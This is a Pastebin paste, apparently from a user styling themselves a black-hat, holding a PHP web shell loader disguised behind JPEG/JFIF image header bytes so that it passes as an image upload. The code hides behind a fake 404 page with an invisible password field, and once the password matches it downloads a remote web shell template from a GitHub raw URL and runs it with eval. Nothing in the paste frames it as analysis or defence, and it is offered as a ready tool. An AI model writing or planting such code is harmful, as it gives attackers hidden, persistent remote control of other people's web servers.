Advertisement
blackhat1337

min

Jul 5th, 2024 (edited)
881
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.43 KB | None | 0 0
  1.     
  2.  
  3.           
  4. 
  5.     
  6. 
  7. 
  8. ��C   ������"#Qr����&1!A"2qQa��� ?�y,�/3J�ݹ�߲؋5�Xw���y�R��I0�2�PI�I��iM����r�N&"KgX:����nTJnLK��@!�-� ���m�;�g���&�hw���@�ܗ 9�-�.�1<y����Q�U�ہ?.����b߱�֫�w*V��) `$��b�ԟ��X�-�T��G�3�g ����Jx���U/��v_s(H�@T�J����n��!�gfb�c�:�l[�Qe 9�PLb��C�m[5��'�jgl���_���l-;"Pk���Q�_�^�S�x?"���Y騐�O� q�`~~�t�U�Cڒ�V      I1��_��
  9.  
  10. ����JFIF��
  11. ÿØÿà JFIF      ÿþ readme.
  12. session_start<?php
  13. session_start();
  14. $password = '62623caf10268b16bb27676b5b27678f';
  15.  
  16. if (!isset($_SESSION[md5($password)])) {
  17.     if(isset($_POST['password']) && !empty($_POST['password']) && md5($_POST['password']) == $password) {
  18.         $_SESSION[md5($password)] = true;
  19.     } else {
  20.         http_response_code(404);
  21.         echo '<form method="post" action=""><input type="password" style="border:none" name="password"></form>';
  22.         exit;
  23.     }
  24. }
  25. $sa = file_get_contents('raw.githubusercontent.com/exploit-haxor/webshell/main/template.php');
  26. eval('?>'.$sa);
  27.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement